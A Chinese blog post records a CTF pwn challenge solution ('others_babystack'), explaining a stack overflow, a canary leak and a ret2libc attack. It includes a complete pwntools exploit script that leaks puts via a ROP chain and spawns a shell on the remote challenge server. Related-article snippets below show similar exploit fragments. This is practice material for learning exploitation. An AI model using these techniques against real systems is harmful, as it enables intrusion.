20.5.26pwn做题记录

最新推荐文章于 2024-01-24 17:16:50 发布
最新推荐文章于 2024-01-24 17:16:50 发布
阅读量250 收藏
点赞数
分类专栏: Pwn 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/106376967
版权

others_babystack
之前做过差不多的,只不过是改got表的,但是64位好久不做了,忘了好多
题目开启了canary保护
先看一下源码:

明显看到case1存在栈溢出漏洞,然后case2存在打印函数可以把canary打印出来,再在case3退出一下,利用一下漏洞就可以了
(注:我之前忘记了64位传参要用寄存器di,si,dx,cx,r8,r9的顺序)
exp:

from pwn import *
from LibcSearcher import LibcSearcher
#sh=process('./bs')
sh=remote('node3.buuoj.cn',28333)
elf=ELF('./bs')
context.log_level='debug'

puts_plt=0x400690
puts_got=elf.got['puts']
pop_di_addr=0x400a93
main_addr=0x400908

sh.recvuntil('>> ')
sh.sendline('1')
payload1='a'*0x88
sh.sendline(payload1)

sh.recvuntil('>> ')
sh.sendline('2')
sh.recvuntil('a\n')
canary=sh.recv(7)
canary=u64(canary.rjust(8,'\x00'))
print hex(canary)

payload2='a'*0x88+p64(canary)+'b'*8+p64(pop_di_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
sh.recvuntil('>> ')
sh.sendline('1')
sh.sendline(payload2)

sh.recvuntil('>> ')
sh.sendline('3')

puts_addr=u64(sh.recv(6).ljust(8,'\x00'))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')#ai
sys_addr=libc.dump('system')+offset
bin_addr=libc.dump('str_bin_sh')+offset
print offset
print libc.dump('system')
print libc.dump('str_bin_sh')

payload3='a'*0x88+p64(canary)+'b'*8+p64(pop_di_addr)+p64(bin_addr)+p64(sys_addr)
sh.recvuntil('>> ')
sh.sendline('1')
sh.sendline(payload3)
sh.sendlineafter('>> ','3')

sh.interactive()
北岛静石
关注
专栏目录
3.nc在PWN中的使用
admin的博客
09-15 4057
一、NC的基本知识。 NC:的使用:nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 网络调试——测试端口号能否连接 :nc -zv 主机的ip或域名 端口号 -z告诉netcat,用户不想发送数据给主机,nc不用等待用户输入。 -v告诉netcat输出详细的交互过程。 题目: 打开kali的命令行:输入上面那一串指令。 然后他会换行:不是卡住,而是在等待我们输入进一步的指令。 ...
BugKu做题记录pwn】(持续更新中)
Assassin
04-06 3909
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
ctfshow pwn——PWN签到题、pwn02
qq_55233040的博客
01-24 5470
PWNPWN签到题pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
pwn 做题记录 2.8 adworld hello_pwn
qq_62423835的博客
02-08 2652
菜鸡的第二篇日记
pwn做题之ret2libc1
最新发布
2303_79500944的博客
01-24 1044
(shellcraft.sh(),asm(shellcraft.sh()))这两条都是不能在这题派上用场。system(里面的参数要的是/bin/sh而不是shell!开启了NX意味着通常情况下不能执行自己编写的shellcode。找到system_plt的地址最后也能执行system真实地址。system("/bin/sh")才算拿到程序控制权。虽然有system但是没起到后门函数的作用。system参数位置在往上俩个字节。攻击这道题的通用结构。
【CTFshow】——PWN签到题
IronmanJay
08-15 1275
PWN签到题-nc pwn.challenge.ctf.show 28171
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5406
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
pwn做题环境搭建
qq_36495104的博客
05-08 1330
pwn做题环境搭建 系统 Ubuntu16.04 x64 安装pip2 wget https://files.pythonhosted.org/packages/11/b6/abcb525026a4be042b486df43905d6893fb04f05aac21c32c638e939e447/pip-9.0.1.tar.gz tar -zxvf pip-9.0.1.tar.gz cd pip-9.0.1 python setup.py install #我这里只装了python2 如果上一步安装时提
ctfshow 内部赛 pwn 签到题
SCP000111的博客
11-16 1781
ctfshow 内部赛 pwn 签到题 找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
【DSCTF2022】pwn补题记录
Assassin
07-26 1475
DSCTF 2022 pwn解题报告
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn做题环境1
08-08
pwn做题环境1
20.5.23pwn做题记录
eeeeeight的博客
05-24 184
cmcc_simplerop 一开始以为是用里面定义的"puts函数"打印函数地址做的,然后失败了:LibcSearcher找不到匹配的libc,猜测可能是因为他的"puts"函数是自定义的(因为没有在plt表中),所以打印出的地址不正确? 既然不能像以前一样使用system函数,那就再试一下int 80h结果真有函数 然后就是编写exp了 from pwn import * from LibcSearcher import LibcSearcher #sh=process('./sim') sh=remo
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6535
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6063
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2141
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1836
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1636
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1210
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
Recho.doc pwn题:栈溢出与shutdown漏洞利用
在"攻防世界pwn题:Recho.doc"这份文档中,讨论了一个针对64位二进制文件的逆向工程和漏洞利用挑战。该文件没有启用canary和PIE保护机制,提供了丰富的学习材料。以下是关键知识点的详细解析: 1. **文件与环境分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值